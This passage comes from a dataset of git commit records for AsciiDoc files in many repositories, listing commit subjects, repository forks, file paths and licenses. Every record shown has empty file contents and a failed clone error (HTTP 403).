n\/camel,drsquidop\/camel,acartapanis\/camel,curso007\/camel,tadayosi\/camel,cunningt\/camel,alvinkwekel\/camel,pmoerenhout\/camel,christophd\/camel,objectiser\/camel,christophd\/camel,scranton\/camel,mcollovati\/camel,pax95\/camel,ullgren\/camel,rmarting\/camel,dmvolod\/camel,dmvolod\/camel,anton-k11\/camel,anton-k11\/camel,kevinearls\/camel,cunningt\/camel,jonmcewen\/camel,snurmine\/camel,scranton\/camel,adessaigne\/camel,pax95\/camel,akhettar\/camel,tlehoux\/camel,tdiesler\/camel,ullgren\/camel,anoordover\/camel,apache\/camel,DariusX\/camel,gautric\/camel,kevinearls\/camel,jonmcewen\/camel,isavin\/camel,sverkera\/camel,tlehoux\/camel,apache\/camel,pkletsko\/camel,cunningt\/camel,Thopap\/camel,pmoerenhout\/camel,onders86\/camel,tdiesler\/camel,drsquidop\/camel,mgyongyosi\/camel,pkletsko\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,tdiesler\/camel,acartapanis\/camel,tadayosi\/camel,kevinearls\/camel,jamesnetherton\/camel,christophd\/camel,acartapanis\/camel,Fabryprog\/camel,adessaigne\/camel,jamesnetherton\/camel,akhettar\/camel,tlehoux\/camel,tadayosi\/camel,pmoerenhout\/camel,alvinkwekel\/camel,snurmine\/camel,nboukhed\/camel,rmarting\/camel,prashant2402\/camel,mgyongyosi\/camel,kevinearls\/camel,prashant2402\/
camel,yuruki\/camel,nboukhed\/camel,salikjan\/camel,snurmine\/camel,cunningt\/camel,punkhorn\/camel-upstream,gautric\/camel,cunningt\/camel,zregvart\/camel,onders86\/camel,gautric\/camel,alvinkwekel\/camel,gnodet\/camel,davidkarlsen\/camel,dmvolod\/camel,jamesnetherton\/camel,nboukhed\/camel,prashant2402\/camel,akhettar\/camel,snurmine\/camel,ullgren\/camel,DariusX\/camel,christophd\/camel,drsquidop\/camel,yuruki\/camel,objectiser\/camel,anton-k11\/camel,tdiesler\/camel,nikhilvibhav\/camel,gnodet\/camel,kevinearls\/camel,mcollovati\/camel,gautric\/camel,snurmine\/camel,davidkarlsen\/camel,curso007\/camel,rmarting\/camel,ullgren\/camel,gautric\/camel,apache\/camel,objectiser\/camel,CodeSmell\/camel,pax95\/camel,prashant2402\/camel,DariusX\/camel,akhettar\/camel,curso007\/camel,salikjan\/camel,nicolaferraro\/camel,sverkera\/camel,drsquidop\/camel,tdiesler\/camel,adessaigne\/camel,Fabryprog\/camel,pkletsko\/camel,akhettar\/camel,onders86\/camel,dmvolod\/camel,apache\/camel,pkletsko\/camel,prashant2402\/camel,dmvolod\/camel,nboukhed\/camel,adessaigne\/camel,rmarting\/camel,isavin\/camel,nboukhed\/camel,sverkera\/camel,nboukhed\/camel,nicolaferraro\/camel,mgyongyosi\/camel,tadayosi\/camel,Thopap\/camel,zregvart\/camel,tlehoux\/camel,yuruki\/camel,pax95\/camel,christophd\/camel,mgyongyosi\/camel,nikhilvibhav\/camel,scranton\/camel,davidkarlsen\/camel,pmoerenhout\/camel,acartapanis\/camel,jonmcewen\/camel,pax95\/camel,CodeSmell\/camel,tadayosi\/camel,acartapanis\/camel,anton-k11\/camel","old_file":"components\/camel-ribbon\/src\/main\/docs\/ribbon-component.adoc","new_file":"components\/camel-ribbon\/src\/main\/docs\/ribbon-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pkletsko\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4485c8ea7774d93c968a26f94096216666b5924a","subject":"Added book.adoc default file","message":"Added book.adoc default file\n","repos":"vladmihalcea\/unfolding-java-transactions,wgpshashank\/unfolding-java-transactions,vladmihalcea\/unfolding-java-transactions,wgpshashank\/unfolding-java-transactions","old_file":"book.adoc","new_file":"book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wgpshashank\/unfolding-java-transactions.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad8cbe994b5683ad686d3279ea4990f5787eece6","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37ad1f1e89f1b60d13e09345c273dbfaa052e050","subject":"Initial commit","message":"Initial 
commit\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"eecd337a69a70df6f3924f9b5023383b0d89ab8b","subject":"added introduction","message":"added introduction\n","repos":"oss-ethinking\/amajza","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oss-ethinking\/amajza.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfa4bf7972dac7868a5d5cf6c24a8ebe3a35ab04","subject":"y2b create post Sony PS3 Wireless Stereo Headset Unboxing (Playstation 3)","message":"y2b create post Sony PS3 Wireless Stereo Headset Unboxing (Playstation 3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-19-Sony-PS3-Wireless-Stereo-Headset-Unboxing-Playstation-3.adoc","new_file":"_posts\/2011-09-19-Sony-PS3-Wireless-Stereo-Headset-Unboxing-Playstation-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07ff722e92109923fb283d079a747be6db6e9187","subject":"Update 2016-05-17-Episode-57-Dnyeahh-I-speak-good-or-Sharks-with-Flippers.adoc","message":"Update 2016-05-17-Episode-57-Dnyeahh-I-speak-good-or-Sharks-with-Flippers.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-05-17-Episode-57-Dnyeahh-I-speak-good-or-Sharks-with-Flippers.adoc","new_file":"_posts\/2016-05-17-Episode-57-Dnyeahh-I-speak-good-or-Sharks-with-Flippers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e65abcdf8f23f9d156fccc616619548b528b9e8","subject":"Fix comment for item 2 of dir traversal","message":"Fix comment for item 2 of dir traversal\n\nEdited comment for item 2 of dir traversal example to correspond to the cited code which refers to 'bin' folder rather than 'dir' 
one\n","repos":"guangying945\/incubator-groovy,tkruse\/incubator-groovy,eginez\/incubator-groovy,genqiang\/incubator-groovy,eginez\/incubator-groovy,graemerocher\/incubator-groovy,tkruse\/incubator-groovy,samanalysis\/incubator-groovy,ebourg\/incubator-groovy,paplorinc\/incubator-groovy,yukangguo\/incubator-groovy,fpavageau\/groovy,apache\/incubator-groovy,upadhyayap\/incubator-groovy,nobeans\/incubator-groovy,PascalSchumacher\/incubator-groovy,traneHead\/groovy-core,i55ac\/incubator-groovy,graemerocher\/incubator-groovy,pledbrook\/incubator-groovy,taoguan\/incubator-groovy,nkhuyu\/incubator-groovy,shils\/groovy,russel\/groovy,russel\/groovy,upadhyayap\/incubator-groovy,eginez\/incubator-groovy,nobeans\/incubator-groovy,paplorinc\/incubator-groovy,shils\/incubator-groovy,kidaa\/incubator-groovy,fpavageau\/groovy,kidaa\/incubator-groovy,nobeans\/incubator-groovy,guangying945\/incubator-groovy,paulk-asert\/groovy,apache\/groovy,aaronzirbes\/incubator-groovy,alien11689\/incubator-groovy,graemerocher\/incubator-groovy,paplorinc\/incubator-groovy,taoguan\/incubator-groovy,bsideup\/incubator-groovy,dpolivaev\/groovy,EPadronU\/incubator-groovy,gillius\/incubator-groovy,adjohnson916\/incubator-groovy,ebourg\/incubator-groovy,pickypg\/incubator-groovy,jwagenleitner\/incubator-groovy,sagarsane\/incubator-groovy,apache\/incubator-groovy,aim-for-better\/incubator-groovy,armsargis\/groovy,yukangguo\/incubator-groovy,samanalysis\/incubator-groovy,dpolivaev\/groovy,taoguan\/incubator-groovy,EPadronU\/incubator-groovy,avafanasiev\/groovy,jwagenleitner\/incubator-groovy,fpavageau\/groovy,paulk-asert\/incubator-groovy,apache\/groovy,shils\/groovy,guangying945\/incubator-groovy,alien11689\/incubator-groovy,avafanasiev\/groovy,guangying945\/incubator-groovy,EPadronU\/incubator-groovy,ChanJLee\/incubator-groovy,jwagenleitner\/groovy,ChanJLee\/incubator-groovy,sagarsane\/incubator-groovy,bsideup\/groovy-core,paulk-asert\/incubator-groovy,nkhuyu\/incubator-groovy,i55ac\/incubator-groovy,PascalSchumacher\/incubator-groovy,i55ac\/incubator-groovy,ChanJLee\/incubator-groovy,eginez\/incubator-groovy,pickypg\/incubator-groovy,adjohnson916\/incubator-groovy,kidaa\/incubator-groovy,antoaravinth\/incubator-groovy,apache\/incubator-groovy,PascalSchumacher\/incubator-groovy,nkhuyu\/incubator-groovy,kenzanmedia\/incubator-groovy,i55ac\/incubator-groovy,bsideup\/groovy-core,paulk-asert\/groovy,bsideup\/groovy-core,antoaravinth\/incubator-groovy,paulk-asert\/incubator-groovy,samanalysis\/incubator-groovy,paulk-asert\/incubator-groovy,pickypg\/incubator-groovy,upadhyayap\/incubator-groovy,kenzanmedia\/incubator-groovy,shils\/incubator-groovy,traneHead\/groovy-core,rabbitcount\/incubator-groovy,yukangguo\/incubator-groovy,jwagenleitner\/groovy,EPadronU\/incubator-groovy,kidaa\/incubator-groovy,tkruse\/incubator-groovy,bsideup\/incubator-groovy,kenzanmedia\/incubator-groovy,russel\/groovy,graemerocher\/incubator-groovy,dpolivaev\/groovy,gillius\/incubator-groovy,alien11689\/incubator-groovy,antoaravinth\/incubator-groovy,nobeans\/incubator-groovy,jwagenleitner\/incubator-groovy,pledbrook\/incubator-groovy,russel\/groovy,pledbrook\/incubator-groovy,aim-for-better\/incubator-groovy,ChanJLee\/incubator-groovy,samanalysis\/incubator-groovy,aaronzirbes\/incubator-groovy,bsideup\/groovy-core,shils\/groovy,yukangguo\/incubator-groovy,shils\/incubator-groovy,ebourg\/incubator-groovy,aim-for-better\/incubator-groovy,taoguan\/incubator-groovy,jwagenleitner\/incubator-groovy,apache\/incubator-groovy,traneHead\/groovy-core,apache\/groovy,ap
ache\/groovy,pledbrook\/incubator-groovy,pickypg\/incubator-groovy,sagarsane\/incubator-groovy,nkhuyu\/incubator-groovy,sagarsane\/incubator-groovy,adjohnson916\/incubator-groovy,paulk-asert\/groovy,PascalSchumacher\/incubator-groovy,gillius\/incubator-groovy,rabbitcount\/incubator-groovy,russel\/incubator-groovy,armsargis\/groovy,aaronzirbes\/incubator-groovy,adjohnson916\/incubator-groovy,ebourg\/incubator-groovy,avafanasiev\/groovy,armsargis\/groovy,gillius\/incubator-groovy,aaronzirbes\/incubator-groovy,armsargis\/groovy,paulk-asert\/incubator-groovy,bsideup\/incubator-groovy,rabbitcount\/incubator-groovy,paulk-asert\/groovy,kenzanmedia\/incubator-groovy,jwagenleitner\/groovy,genqiang\/incubator-groovy,fpavageau\/groovy,upadhyayap\/incubator-groovy,antoaravinth\/incubator-groovy,paplorinc\/incubator-groovy,russel\/incubator-groovy,genqiang\/incubator-groovy,shils\/groovy,dpolivaev\/groovy,genqiang\/incubator-groovy,avafanasiev\/groovy,bsideup\/incubator-groovy,alien11689\/incubator-groovy,traneHead\/groovy-core,jwagenleitner\/groovy,tkruse\/incubator-groovy,aim-for-better\/incubator-groovy,russel\/incubator-groovy,russel\/incubator-groovy,shils\/incubator-groovy,PascalSchumacher\/incubator-groovy,rabbitcount\/incubator-groovy","old_file":"src\/spec\/doc\/working-with-io.adoc","new_file":"src\/spec\/doc\/working-with-io.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kidaa\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6d8c89f446f4a9f77b4a1b5e98263977c532fef","subject":"y2b create post NVIDIA in your car? (Project Mercury - CES 2014)","message":"y2b create post NVIDIA in your car? (Project Mercury - CES 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-12-NVIDIA-in-your-car-Project-Mercury--CES-2014.adoc","new_file":"_posts\/2014-01-12-NVIDIA-in-your-car-Project-Mercury--CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34703e4f3f45b1ea71abd63ac1f0c0d3d70f224f","subject":"Renamed '_posts\/2019-02-10-RTFM-Episode-0x01.adoc' to '_posts\/2018-02-10-RTFM-Episode-0x01.adoc'","message":"Renamed '_posts\/2019-02-10-RTFM-Episode-0x01.adoc' to '_posts\/2018-02-10-RTFM-Episode-0x01.adoc'","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2018-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2018-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"666b38abd670b9c662a5b7220c3e17d4e0d60fb5","subject":"Update 2019-02-10-RTFM-Episode-0x01.adoc","message":"Update 2019-02-10-RTFM-Episode-0x01.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d5b0a5da16be7ad20a90fff0f448b7a0e3b00dd","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker\/curl-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker\/curl-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"048dbf5c441697e676d3e6d05a630b6cc5eeb4b4","subject":"Update 2016-03-28-Happy-Easter.adoc","message":"Update 2016-03-28-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"_posts\/2016-03-28-Happy-Easter.adoc","new_file":"_posts\/2016-03-28-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a092515d5fd9d1099c69a3b0a1bf66164b6e0e80","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0500b749ef98693bc2f5114c955b4d6e727a302d","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730485a25d757038699033385ec9e3343df58204","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f44297bfd251b2d77ba6d253f8a6fa147a3f58","subject":"Plan 13","message":"Plan 13\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"cb824a716ffefa59bc8ed0e9e15c28daee03a341","subject":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","message":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"392a3d1586024a012f23de412e55aace7a4ff612","subject":"job #12308 add implementation note","message":"job #12308 add implementation note\n","repos":"lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12308_parse_functions.int.adoc","new_file":"doc-bridgepoint\/notes\/12308_parse_functions.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95cefe95c1014ec7726a879c384beafb1a927e12","subject":"initial placeholder GEP for sealed classes","message":"initial placeholder GEP for sealed classes\n","repos":"keeganwitt\/groovy-website,keeganwitt\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-13.adoc","new_file":"site\/src\/site\/wiki\/GEP-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/keeganwitt\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7195e13f0de43dc9f3927b00c85b7740e31880fe","subject":"Rewrite unclear part in GridLayout documentation","message":"Rewrite unclear part in GridLayout documentation","repos":"mstahv\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework","old_file":"documentation\/layout\/layout-gridlayout.asciidoc","new_file":"documentation\/layout\/layout-gridlayout.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e09126c4fd7a7807dcfb064ab2be7431ff0de39e","subject":"updated to reflect #316","message":"updated to reflect 
#316","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain","old_file":"src\/docs\/manual\/03_task_exportJiraIssues.adoc","new_file":"src\/docs\/manual\/03_task_exportJiraIssues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81863cb47f8450d625067aff87cc29969c412093","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"582d7ba79722b97c95058852db12a58d958d2f90","subject":"Update 2015-12-28-Hola-Mundo.adoc","message":"Update 2015-12-28-Hola-Mundo.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2015-12-28-Hola-Mundo.adoc","new_file":"_posts\/2015-12-28-Hola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"354d6779b6d45ba8f7ef39e5f9c6ae2bacd81275","subject":"Deleted _posts\/2016-08-09.adoc","message":"Deleted _posts\/2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09.adoc","new_file":"_posts\/2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ffd4157a1d917313eac074dd06b9e2e324f83f8","subject":"Update 2016-04-08-First-Post.adoc","message":"Update 2016-04-08-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-First-Post.adoc","new_file":"_posts\/2016-04-08-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"299be3ae8a7f6bb5c8ad68877128d2198b75a449","subject":"Update 2016-08-23-First-Post.adoc","message":"Update 2016-08-23-First-Post.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2016-08-23-First-Post.adoc","new_file":"_posts\/2016-08-23-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2b4ebe83bcd0629175cd99260a03266b605fc44","subject":"Update 2016-07-29-TEST.adoc","message":"Update 2016-07-29-TEST.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-TEST.adoc","new_file":"_posts\/2016-07-29-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec585306734d4f478c6dd06d4df930e9117d5c37","subject":"Update 2016-10-27-Demo.adoc","message":"Update 2016-10-27-Demo.adoc","repos":"ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog","old_file":"_posts\/2016-10-27-Demo.adoc","new_file":"_posts\/2016-10-27-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ruaqiwei23\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3934ab6699d6edd85e9ca3a2b98c9a3972113400","subject":"JDK 17","message":"JDK 17\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4edfd5033894d23a382c80f11c4e715ad21560c","subject":"Update 2004-04-04-Catatan-Istilah-Istilah-pada-Sistem-Komputer.adoc","message":"Update 2004-04-04-Catatan-Istilah-Istilah-pada-Sistem-Komputer.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2004-04-04-Catatan-Istilah-Istilah-pada-Sistem-Komputer.adoc","new_file":"_posts\/2004-04-04-Catatan-Istilah-Istilah-pada-Sistem-Komputer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca6a7fbe770e7eb63c7887468f611ec5e71d459","subject":"Mid-2021 release (#383)","message":"Mid-2021 release (#383)\n\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2021-05-24-release.adoc","new_file":"content\/news\/2021-05-24-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"110b17f9d0125a1e1c2bb775c05679b9520b031a","subject":"Update 2016-01-27-Puzzle-5-e-ticket.adoc","message":"Update 2016-01-27-Puzzle-5-e-ticket.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-27-Puzzle-5-e-ticket.adoc","new_file":"_posts\/2016-01-27-Puzzle-5-e-ticket.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
